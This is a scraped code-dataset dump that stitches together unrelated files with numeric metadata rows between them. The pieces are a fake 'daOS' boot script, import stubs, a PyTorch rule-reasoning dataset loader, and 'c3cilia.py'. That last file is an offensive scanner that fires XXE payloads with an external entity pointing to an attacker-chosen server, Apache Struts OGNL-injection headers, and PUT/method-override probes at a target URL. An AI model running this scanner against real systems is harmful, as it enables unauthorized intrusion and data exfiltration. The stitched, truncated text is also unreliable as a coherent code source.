MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhos++++oyhNMMMMMN+++shymdsoooosyMMMMMMMMMMm::::::syMNdsyyyyyhyoooooy///////////---------------------s+----------------ymo-:dmmmmh/::-::::::--:yd/-ymh---`-yhs-------------+s---------------.-mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhoooymMMMMMdyyyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhmNmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm++++++ohyyyyyhmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNmmmmmmmmmmmmmmmmNMNmmMMMMMMMMMMMMMMMMMMMMMNmNMMmmmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
""";
print("Starting da convertible kernel v3.0...");
time.sleep(2);
print("Loading daconvertible-ubuntu1..");
time.sleep(2);
print("Playing local audio file /daOS/daSystem/daMedia/daMusic.dap..");
time.sleep(1);
print("Merging daconvertible-ubuntu1 with dahead-ubuntu2");
time.sleep(1);
print("Loading da driver modules...")
print("Starting daDesktop...");
time.sleep(3);
print("DaOS successfully booted.");
print("LET'S GOOOOO!!!!!!");
time.sleep(5);
print(daDesktop);
| 448.41358
| 516
| 0.802693
| 858
| 72,643
| 67.960373
| 0.786713
| 0.240096
| 0.308695
| 0.342994
| 0.137198
| 0.137198
| 0.085749
| 0.085749
| 0.085749
| 0
| 0
| 0.000152
| 0.003992
| 72,643
| 162
| 517
| 448.41358
| 0.805758
| 0
| 0
| 0.118012
| 0
| 0.068323
| 0.996861
| 0.988506
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006211
| 0
| 0.006211
| 0.055901
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
15c7a95365a5d379d8b277edf2a1575af905cac4
| 84
|
py
|
Python
|
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
icedata/datasets/biwi/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | null | null | null |
from icedata.datasets.biwi.data import *
from icedata.datasets.biwi.parser import *
| 28
| 42
| 0.809524
| 12
| 84
| 5.666667
| 0.583333
| 0.323529
| 0.558824
| 0.676471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 84
| 2
| 43
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c61625528b7120766e0d6f192cae4edd2399fc0b
| 49
|
py
|
Python
|
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
build/lib/utils/myUtil.py
|
kevin72500/CoreUtils
|
569b3462be201b1aeced6158c7f75746385cb573
|
[
"MIT"
] | null | null | null |
import Faker
def out():
print('this is test')
| 16.333333
| 25
| 0.653061
| 8
| 49
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204082
| 49
| 3
| 25
| 16.333333
| 0.820513
| 0
| 0
| 0
| 0
| 0
| 0.24
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bafe5b8cfefbc9af6970a99d442487e27583f70f
| 14,533
|
py
|
Python
|
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | 16
|
2021-09-20T05:24:44.000Z
|
2022-03-15T07:12:21.000Z
|
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | null | null | null |
spectre/datasets.py
|
IBM/Neural_Unification_for_Logic_Reasoning_over_Language
|
1624c499743b3e2539c6640b9ac1d6bf8ff88d5d
|
[
"Apache-2.0"
] | 1
|
2022-03-15T07:12:20.000Z
|
2022-03-15T07:12:20.000Z
|
import enum
import random
from torch.utils.data import Dataset
import json
class CWA(str, enum.Enum):
ALL = "all",
CWA = "cwa",
NOT_CWA = "not_cwa",
class RuleReasoningDataset(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetForCWAClassification(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
label = not ("proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy'])
d = (context, question['text'], label)
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetOnlyCWA(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if not ("proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']):
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetOnlyNotCWA(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class RuleReasoningDatasetAllBalanced(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
self.data = [item for item in self.data if item not in not_false_queries and item not in not_true_queries]
self.__balance_negative_queries_lists(not_false_queries, not_true_queries)
not_not_true_queries = list(filter(lambda x: "not" not in x[1] and x[2] is True, self.data))
n_not_not_false_queries = len(list(filter(lambda x: "not" not in x[1] and x[2] is False, self.data)))
self.data = [item for item in self.data if item not in not_not_true_queries]
random.shuffle(not_not_true_queries)
self.data.extend(not_not_true_queries[0:n_not_not_false_queries])
print("Data size:", len(self.data))
def __balance_negative_queries_lists(self, queries_1, queries_2):
if len(queries_2) > len(queries_1):
queries_1, queries_2 = queries_2, queries_1
random.shuffle(queries_1)
while len(queries_1) > len(queries_2):
e = queries_1.pop()
new_query = e[1].replace("not", "")
new_label = not e[2]
self.data.append((e[0], new_query, new_label))
self.data.extend(queries_1)
self.data.extend(queries_2)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
# class RuleReasoningDatasetAllBalanced(Dataset):
# def __init__(self, root, depths, split='train', select_depth=None):
# self.data = []
# self.label_dict = {True: 1, False: 0}
# for depth in depths:
# with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
# lines = [json.loads(jline) for jline in f.read().split('\n')]
# for line in enumerate(lines):
# context = line[1]['context']
# questions = line[1]['questions']
# for question in questions:
# x = question['meta']['QDep']
# if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
# d = (context, question['text'], question['label'])
# if select_depth is not None:
# if x in select_depth:
# self.data.append(d)
# else:
# self.data.append(d)
# with_not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
# with_not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
# without_not_true_queries = list(filter(lambda x: "not" not in x[1] and x[2] is True, self.data))
# without_not_false_queries = list(filter(lambda x: "not" not in x[1] and x[2] is False, self.data))
# self.data = []
# random.shuffle(without_not_true_queries)
# ratio = 0.1
# n = int(ratio*len(without_not_false_queries))
# self.data.extend(without_not_true_queries[0:n])
# self.data.extend(without_not_false_queries)
#
# random.shuffle(with_not_false_queries)
# n = int(ratio * len(with_not_true_queries))
# self.data.extend(with_not_false_queries[0:n])
# self.data.extend(with_not_true_queries)
#
# print("Data size:", len(self.data))
def __len__(self):
return len(self.data)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
class RuleReasoningDatasetNotCWATrueBalanced(Dataset):
def __init__(self, root, depths, split='train', select_depth=None):
self.data = []
self.label_dict = {True: 1, False: 0}
for depth in depths:
with open(f'{root}/depth-{depth}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
if "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']:
d = (context, question['text'], question['label'])
if select_depth is not None:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
not_false_queries = list(filter(lambda x: "not" in x[1] and x[2] is False, self.data))
not_true_queries = list(filter(lambda x: "not" in x[1] and x[2] is True, self.data))
self.data = [item for item in self.data if item not in not_false_queries and item not in not_true_queries]
self.__balance_negative_queries_lists(not_false_queries, not_true_queries)
print("Data size:", len(self.data))
def __balance_negative_queries_lists(self, queries_1, queries_2):
if len(queries_2) > len(queries_1):
queries_1, queries_2 = queries_2, queries_1
random.shuffle(queries_1)
while len(queries_1) > len(queries_2):
e = queries_1.pop()
new_query = e[1].replace("not", "")
new_label = not e[2]
self.data.append((e[0], new_query, new_label))
self.data.extend(queries_1)
self.data.extend(queries_2)
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class BirdElectricityDataset(Dataset):
def __init__(self, root, split='train', select_depth=None, name_data=None, cwa=CWA.ALL):
self.data = []
self.label_dict = {True: 1, False: 0}
with open(f'{root}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
is_provable = "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']
if cwa == CWA.ALL or (cwa == CWA.NOT_CWA and is_provable) or (cwa == CWA.CWA and not is_provable):
if len(select_depth) > 0:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
class NatLangDataset(Dataset):
def __init__(self, root, split='train', select_depth=None, cwa=CWA.ALL):
self.data = []
self.label_dict = {True: 1, False: 0}
with open(f'{root}/{split}.jsonl', 'r') as f:
lines = [json.loads(jline) for jline in f.read().split('\n')]
for line in enumerate(lines):
context = line[1]['context']
questions = line[1]['questions']
for question in questions:
x = question['meta']['QDep']
d = (context, question['text'], question['label'])
is_provable = "proof" in question['meta']['strategy'] or "inv-proof" in question['meta']['strategy']
if cwa == CWA.ALL or (cwa == CWA.NOT_CWA and is_provable) or (cwa == CWA.CWA and not is_provable):
if len(select_depth) > 0:
if x in select_depth:
self.data.append(d)
else:
self.data.append(d)
print("Data size:", len(self.data))
def __getitem__(self, index):
context, question, answer = self.data[index]
return context, question, self.label_dict[answer]
def __len__(self):
return len(self.data)
| 43.906344
| 120
| 0.547237
| 1,788
| 14,533
| 4.280201
| 0.055369
| 0.085718
| 0.036587
| 0.03528
| 0.934405
| 0.921991
| 0.908663
| 0.908663
| 0.90801
| 0.90801
| 0
| 0.009885
| 0.324778
| 14,533
| 331
| 121
| 43.906344
| 0.769999
| 0.13232
| 0
| 0.894737
| 0
| 0
| 0.075553
| 0.016224
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11336
| false
| 0
| 0.016194
| 0.036437
| 0.251012
| 0.032389
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2459d95b08925f110f36acd054e21d37c6c23dc2
| 126
|
py
|
Python
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 2
|
2019-10-08T10:49:52.000Z
|
2021-10-01T11:26:31.000Z
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 1
|
2019-05-16T13:48:29.000Z
|
2019-05-16T13:48:49.000Z
|
vstreamer/client/player/__init__.py
|
artudi54/video-streamer
|
66e5e722ed66abe5877488f177c0ac4f13325382
|
[
"MIT"
] | 1
|
2019-10-08T10:49:56.000Z
|
2019-10-08T10:49:56.000Z
|
from vstreamer.client.player.VideoPlayerBar import VideoPlayerBar
from vstreamer.client.player.VideoPlayer import VideoPlayer
| 42
| 65
| 0.888889
| 14
| 126
| 8
| 0.5
| 0.232143
| 0.339286
| 0.446429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063492
| 126
| 2
| 66
| 63
| 0.949153
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
033743a8d96608444da334121a3f1056ab58df6b
| 7,876
|
py
|
Python
|
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | 1
|
2020-12-01T04:43:02.000Z
|
2020-12-01T04:43:02.000Z
|
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | null | null | null |
c3cilia.py
|
karthi-the-hacker/c3cilia
|
a62cb92fc393a513a7432fd02a85393339649e16
|
[
"MIT"
] | null | null | null |
#importing important lib
import requests
import sys
blink = '\33[5m'
cyan ='\033[36m'
yellow ='\033[33m'
payload = '.multipart/form-data~%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("karthithehacker",4*4)}'
payload1 = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('karthithehacker',4*4)}.multipart/form-data"
head = {
'User-Agent': 'c3cillia (https://github.com/karthi-the-hacker/c3cilia)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
head1 = {
'User-Agent': 'c3cillia (https://github.com/karthi-the-hacker/c3cilia)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload1),
'Accept': '*/*'
}
def banner():
print (yellow)
print " .-----------------------------. "
print " | Hi Hackers | "
print (" | Tool : "+ cyan + "c3cilia "+yellow+ "|")
print " | Author : @karthi_the_hacker| "
print " | Jai Hind | "
print " '-----------------------------' "
print " ^ (\_/) "
print " '----- (O.o) "
print " (> <) "
print " "
def psend():
#getting CLI arg
url = sys.argv[5]
server = sys.argv[2]
#setting data for post request
proxies = {"http": "http://127.0.0.1:7777", "https": "http://127.0.0.1:7777"}
header = {'Content-Type': 'test/xml'}
typel = {'X-HTTP-Method-Override':'PUT'}
agent = {'User-Agent': 'karthi_the_hacker'}
entity = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % emails SYSTEM \"'
entity += server + '\">'
entity += '\r\n%emails;\r\n%content;\r\n]>\r\n<email>&emails;</email>'
#sending post request
x = requests.post(url, data=entity , proxies=proxies, headers=header , verify=False)
print("> " + x.url + " <---url")
print(x.request)
print(x)
print(x.headers)
#print(x.text)
print(x.links)
print("\n <-----------------------------------xxe scan-----------------------------------------------> \n")
i = requests.post(url + "sample.html" , headers=typel , proxies=proxies, verify=False)
print("> " + i.url + " <---url")
print(i.request)
print(i)
print(i.headers)
#print(i.text)
print(i.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
r = requests.put(url + "sample.html", proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(r.request)
print(r)
print(r.headers)
#print(r.text)
print(r.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
s = requests.get(url , headers=head , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(s.request)
print(s)
print(s.headers)
#print(s.text)
print(s.links)
print("\n <---------------------------------struck get scan-------------------------------------------------> \n")
s1 = requests.get(url , headers=head1 , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(s1.request)
print(s1)
print(s1.headers)
#print(s1.text)
print(s1.links)
print("\n <---------------------------------struck get 1 scan-------------------------------------------------> \n")
sp = requests.post(url , headers=head , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(sp.request)
print(sp)
print(sp.headers)
#print(sp.text)
print(sp.links)
print("\n <---------------------------------struck post scan-------------------------------------------------> \n")
sp1 = requests.post(url , headers=head1 , proxies=proxies , verify=False )
print("> " + r.url + " <---url")
print(sp1.request)
print(sp1)
print(sp1.headers)
#print(sp1.text)
print(sp1.links)
print("\n <---------------------------------struck post 1 scan-------------------------------------------------> \n")
def send():
#getting CLI arg
url = sys.argv[4]
server = sys.argv[2]
header = {'Content-Type': 'test/xml'}
typel = {'X-HTTP-Method-Override':'PUT'}
agent = {'User-Agent': 'karthi_the_hacker'}
entity = '<?xml version=\"1.0\" ?>\r\n<!DOCTYPE xxeElement [\r\n<!ELEMENT xxeElement ANY >\r\n<!ENTITY % emails SYSTEM \"'
entity += server + '\">'
entity += '\r\n%emails;\r\n%content;\r\n]>\r\n<email>&emails;</email>'
#sending post request
x = requests.post(url, data=entity , headers=header , verify=False)
print("> " + x.url + " <---url")
print(x.request)
print(x)
print(x.headers)
#print(x.text)
print(x.links)
print("\n <---------------------------------xxe scan-------------------------------------------------> \n")
i = requests.post(url + "sample.html", headers=typel , verify=False)
print("> " + i.url + " <---url")
print(i.request)
print(i)
print(i.headers)
#print(i.text)
print(i.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
r = requests.put(url + "sample.html")
print("> " + r.url + " <---url")
print(r.request)
print(r)
print(r.headers)
#print(r.text)
print(r.links)
print("\n <---------------------------------METHOD scan-------------------------------------------------> \n")
s = requests.get(url , headers=head , verify=False)
print("> " + r.url + " <---url")
print(s.request)
print(s)
print(s.headers)
#print(s.text)
print(s.links)
print("\n <---------------------------------struck get scan-------------------------------------------------> \n")
s1 = requests.get(url , headers=head1 , verify=False)
print("> " + r.url + " <---url")
print(s1.request)
print(s1)
print(s1.headers)
#print(s1.text)
print(s1.links)
print("\n <---------------------------------struck get 1 scan-------------------------------------------------> \n")
sp = requests.post(url , headers=head , verify=False)
print("> " + r.url + " <---url")
print(sp.request)
print(sp)
print(sp.headers)
#print(sp.text)
print(sp.links)
